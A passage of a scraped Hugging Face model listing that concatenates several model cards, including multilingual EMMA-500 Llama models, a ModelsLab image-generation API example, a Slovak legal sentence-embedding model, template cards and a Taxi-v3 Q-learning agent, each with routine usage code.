author={Shaoxiong Ji and Zihao Li and Indraneil Paul and Jaakko Paavola and Peiqin Lin and Pinzhen Chen and Dayyán O'Brien and Hengyu Luo and Hinrich Schütze and Jörg Tiedemann and Barry Haddow},
year={2024},
journal={arXiv preprint 2409.17892},
url={https://arxiv.org/abs/2409.17892},
}
```
|
MaLA-LM/emma-500-llama3-8b-bi | MaLA-LM | 2025-06-09T08:21:46Z | 36 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"dataset:MaLA-LM/mala-monolingual-split",
"dataset:MaLA-LM/mala-code-reasoning-v2",
"dataset:MaLA-LM/mala-bilingual-translation-corpus",
"arxiv:2506.00469",
"arxiv:2409.17892",
"license:llama3",
"autotrain_compatible",
"text-generation... | text-generation | 2025-05-10T07:40:47Z |
---
license: llama3
datasets:
- MaLA-LM/mala-monolingual-split
- MaLA-LM/mala-code-reasoning-v2
- MaLA-LM/mala-bilingual-translation-corpus
base_model:
- meta-llama/Llama-3-8B
library_name: transformers
pipeline_tag: text-generation
---
# Massively Multilingual Adaptation of Large Language Models Using Bilingual Translation Data
## Model Description
**EMMA-500 Llama 3 8B** is a state-of-the-art multilingual language model designed to improve language representation, especially in low-resource languages, through continual pre-training on the **Llama 3 8B** architecture. Leveraging the **[MaLA Corpus](https://huggingface.co/collections/MaLA-LM/mala-corpus-66e05127641a51de34d39529)**, which spans over 500 languages and is augmented with books, code, instruction data, and papers, EMMA-500 excels in multilingual tasks like commonsense reasoning, machine translation, and text classification.
- Project Website: https://mala-lm.github.io/emma-500-gen2.html
- Paper: https://arxiv.org/abs/2506.00469
---
### Model Details
- **Architecture**: Built on Llama 3 8B with enhanced language adaptation through continual pre-training.
- **Languages**: Supports **546 languages** with substantial training data (over 100k tokens each).
- **Data Mix**: A diverse [bilingual mix](https://mala-lm.github.io/static/images/mix-bilingual.png) of text from domains like code, books, instruction data, and papers.
- **Total Tokens**: 671B
**EMMA-500 series**
- 🤗[MaLA-LM/emma-500-llama2-7b](https://huggingface.co/MaLA-LM/emma-500-llama2-7b): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3-8b-mono](https://huggingface.co/MaLA-LM/emma-500-llama3-8b-mono): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3-8b-bi](https://huggingface.co/MaLA-LM/emma-500-llama3-8b-bi): CPT model trained on monolingual data mix in 500+ languages + bilingual translation data in 2,500+ language pairs
- 🤗[MaLA-LM/emma-500-llama3.1-8b-mono](https://huggingface.co/MaLA-LM/emma-500-llama3.1-8b-mono): CPT model trained on monolingual data mix in 500+ languages
- 🤗[MaLA-LM/emma-500-llama3.1-8b-bi](https://huggingface.co/MaLA-LM/emma-500-llama3.1-8b-bi): CPT model trained on monolingual data mix in 500+ languages + bilingual translation data in 2,500+ language pairs
---
### Data Access
🤗[MaLA Corpus Dataset Collection](https://huggingface.co/collections/MaLA-LM/mala-corpus-66e05127641a51de34d39529)
- MaLA monolingual corpus: 🤗[MaLA-LM/mala-monolingual-split](https://huggingface.co/datasets/MaLA-LM/mala-monolingual-split)
- MaLA bilingual translation corpus: 🤗[MaLA-LM/mala-bilingual-translation-corpus](https://huggingface.co/datasets/MaLA-LM/mala-bilingual-translation-corpus)
- MaLA code and reasoning corpus: 🤗[MaLA-LM/mala-code-reasoning-v2](https://huggingface.co/datasets/MaLA-LM/mala-code-reasoning-v2)
---
### Usage
You can use **EMMA-500** for multilingual text generation. Below is an example to generate text using the model:
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
model_name = "MaLA-LM/emma-500-llama3-8b-bi"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)
input_text = "Once upon a time"
inputs = tokenizer(input_text, return_tensors="pt")
outputs = model.generate(**inputs)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
---
## Use Cases and Limitations
- Intended for massively multilingual NLP tasks, e.g., machine translation
- May show performance regression on some tasks and in high-resource languages
- Not intended for real-world deployment, especially in high-stakes domains
---
## Citation
If you find this model useful, please cite the paper below.
```
@article{ji2025emma2,
title={Massively Multilingual Adaptation of Large Language Models Using Bilingual Translation Data},
author={Shaoxiong Ji and Zihao Li and Jaakko Paavola and Indraneil Paul and Hengyu Luo and Jörg Tiedemann},
year={2025},
journal={arXiv preprint 2506.00469},
url={https://arxiv.org/abs/2506.00469},
}
```
See the [paper](https://arxiv.org/abs/2409.17892) below for the earlier EMMA-500 model trained on Llama 2 (🤗[MaLA-LM/emma-500-llama2-7b](https://huggingface.co/MaLA-LM/emma-500-llama2-7b)).
```
@article{ji2024emma500enhancingmassivelymultilingual,
title={{EMMA}-500: Enhancing Massively Multilingual Adaptation of Large Language Models},
author={Shaoxiong Ji and Zihao Li and Indraneil Paul and Jaakko Paavola and Peiqin Lin and Pinzhen Chen and Dayyán O'Brien and Hengyu Luo and Hinrich Schütze and Jörg Tiedemann and Barry Haddow},
year={2024},
journal={arXiv preprint 2409.17892},
url={https://arxiv.org/abs/2409.17892},
}
```
|
stablediffusionapi/lumixgen-cyberrealistic-pony-11.0 | stablediffusionapi | 2025-06-09T08:14:16Z | 0 | 0 | diffusers | [
"diffusers",
"modelslab.com",
"stable-diffusion-api",
"text-to-image",
"ultra-realistic",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionXLPipeline",
"region:us"
] | text-to-image | 2025-06-09T08:12:40Z | ---
license: creativeml-openrail-m
tags:
- modelslab.com
- stable-diffusion-api
- text-to-image
- ultra-realistic
pinned: true
pipeline_tag: text-to-image
library_name: diffusers
widget:
- text: a girl wandering through the forest
output:
url: https://image.civitai.com/xG1nkqKTMzGDvpLrqFT7WA/cbece6a6-4ba3-4011-9245-dbdd5f83b117/original=true,quality=90/00033-1584643324.jpeg
---
# LumixGen CyberRealistic Pony 11.0 API Inference
<Gallery />
## Get API Key
Get an API key from [ModelsLab API](http://modelslab.com); no payment needed.
Replace the key in the code below, and change **model_id** to "lumixgen-cyberrealistic-pony-11.0".
Coding in PHP, Node, Java, etc.? Have a look at the docs for more code examples: [View docs](https://docs.modelslab.com)
Try model for free: [Generate Images](https://modelslab.com/models/lumixgen-cyberrealistic-pony-11.0)
Model link: [View model](https://modelslab.com/models/lumixgen-cyberrealistic-pony-11.0)
View all models: [View Models](https://modelslab.com/models)
```python
import requests
import json
url = "https://modelslab.com/api/v6/images/text2img"
payload = json.dumps({
"key": "your_api_key",
"model_id": "lumixgen-cyberrealistic-pony-11.0",
"prompt": "ultra realistic close up portrait ((beautiful pale cyberpunk female with heavy black eyeliner)), blue eyes, shaved side haircut, hyper detail, cinematic lighting, magic neon, dark red city, Canon EOS R3, nikon, f/1.4, ISO 200, 1/160s, 8K, RAW, unedited, symmetrical balance, in-frame, 8K",
"negative_prompt": "painting, extra fingers, mutated hands, poorly drawn hands, poorly drawn face, deformed, ugly, blurry, bad anatomy, bad proportions, extra limbs, cloned face, skinny, glitchy, double torso, extra arms, extra hands, mangled fingers, missing lips, ugly face, distorted face, extra legs, anime",
"width": "512",
"height": "512",
"samples": "1",
"num_inference_steps": "30",
"safety_checker": "no",
"enhance_prompt": "yes",
"seed": None,
"guidance_scale": 7.5,
"multi_lingual": "no",
"panorama": "no",
"self_attention": "no",
"upscale": "no",
"embeddings": "",
"lora": "",
"webhook": None,
"track_id": None
})
headers = {
'Content-Type': 'application/json'
}
response = requests.request("POST", url, headers=headers, data=payload)
print(response.text)
```
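The endpoint responds with JSON. Below is a minimal sketch of handling it; the `status` and `output` field names are assumptions based on typical ModelsLab responses, so check the API docs for the exact schema:

```python
import json

# Hypothetical example response; the real schema is documented at docs.modelslab.com
sample_response = '{"status": "success", "output": ["https://example.com/generated.png"]}'

data = json.loads(sample_response)
if data.get("status") == "success":
    image_urls = data.get("output", [])
    for url in image_urls:
        print(url)
else:
    print("Generation failed or still processing:", data)
```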
> Use coupon code **DMGG0RBN** to get 25% off. |
szoplakz/slovak-legal-sbert | szoplakz | 2025-06-09T08:05:13Z | 0 | 0 | sentence-transformers | [
"sentence-transformers",
"sentence-similarity",
"feature-extraction",
"generated_from_trainer",
"dataset_size:500000",
"loss:CosineSimilarityLoss",
"base_model:kinit/slovakbert-sts-stsb",
"base_model:finetune:kinit/slovakbert-sts-stsb",
"autotrain_compatible",
"endpoints_compatible",
"region:us"... | sentence-similarity | 2025-06-09T06:12:43Z | ---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- generated_from_trainer
- dataset_size:500000
- loss:CosineSimilarityLoss
base_model: kinit/slovakbert-sts-stsb
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on kinit/slovakbert-sts-stsb
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [kinit/slovakbert-sts-stsb](https://huggingface.co/kinit/slovakbert-sts-stsb). It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [kinit/slovakbert-sts-stsb](https://huggingface.co/kinit/slovakbert-sts-stsb) <!-- at revision 770633080dda1d1867e7179a456ed53138280c08 -->
- **Maximum Sequence Length:** 256 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
<!-- - **Training Dataset:** Unknown -->
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
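Since the model compares its 768-dimensional embeddings with cosine similarity (per the model details above), scores can be computed as sketched below. The small vectors here are placeholders; in real use they would come from `SentenceTransformer("szoplakz/slovak-legal-sbert").encode([...])`, which is assumed to follow the standard sentence-transformers API:

```python
import math

def cosine_similarity(a, b):
    # Similarity score in [-1, 1]; the model's embeddings are compared this way
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(x * x for x in b))
    return dot / (norm_a * norm_b)

# Placeholder vectors; real embeddings are 768-dimensional
emb1 = [1.0, 0.0, 0.5]
emb2 = [0.8, 0.1, 0.4]
print(cosine_similarity(emb1, emb1))  # 1.0 for identical vectors
```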
|
georgeiac00/sentiment-dpo-lora_4_bit_full_data_with_meta | georgeiac00 | 2025-06-09T08:00:09Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T08:00:00Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Satram/Llama_Instruct_Articulo | Satram | 2025-06-09T07:57:30Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"text-generation-inference",
"unsloth",
"llama",
"trl",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | 2025-06-09T07:57:21Z | ---
base_model: unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---
# Uploaded model
- **Developed by:** Satram
- **License:** apache-2.0
- **Finetuned from model:** unsloth/llama-3.2-3b-instruct-unsloth-bnb-4bit
This Llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Hugging Face's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
ufouser/deneme6 | ufouser | 2025-06-09T07:56:27Z | 1 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"llama-factory",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T07:52:14Z | ---
library_name: transformers
tags:
- llama-factory
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
GabrielMM/Instruct_DPO_v2_6ksteps | GabrielMM | 2025-06-09T07:55:53Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-06-09T07:55:15Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Ali-Mhrez/arbertv2-finetuned-segment3-arastance-stance-detection | Ali-Mhrez | 2025-06-09T07:41:02Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2025-06-09T07:40:50Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed to the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
archishin/q_Taxi-v3-v1 | archishin | 2025-06-09T07:37:02Z | 0 | 0 | null | [
"Taxi-v3",
"q-learning",
"reinforcement-learning",
"custom-implementation",
"model-index",
"region:us"
] | reinforcement-learning | 2025-06-09T07:12:22Z | ---
tags:
- Taxi-v3
- q-learning
- reinforcement-learning
- custom-implementation
model-index:
- name: q_Taxi-v3-v1
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: Taxi-v3
type: Taxi-v3
metrics:
- type: mean_reward
value: 7.56 +/- 2.71
name: mean_reward
verified: false
---
# **Q-Learning** Agent playing **Taxi-v3**
This is a trained model of a **Q-Learning** agent playing **Taxi-v3**.
## Usage
```python
import gym

# `load_from_hub` is the helper defined in the Hugging Face Deep RL course notebook
model = load_from_hub(repo_id="archishin/q_Taxi-v3-v1", filename="q-learning.pkl")

# Don't forget to check if you need to add additional attributes (is_slippery=False etc.)
env = gym.make(model["env_id"])
```
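Once the pickle is loaded, acting greedily with the stored Q-table is just an argmax over the current state's row. A minimal sketch (the tiny Q-table below is illustrative; the real one is indexed by Taxi-v3's 500 states and 6 actions):

```python
import numpy as np

def greedy_policy(qtable: np.ndarray, state: int) -> int:
    """Pick the action with the highest Q-value for the given state."""
    return int(np.argmax(qtable[state]))

# Tiny illustrative Q-table: 3 states x 2 actions
qtable = np.array([[0.1, 0.9],
                   [0.5, 0.2],
                   [0.0, 0.0]])
print(greedy_policy(qtable, 0))  # 1
print(greedy_policy(qtable, 1))  # 0
```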
|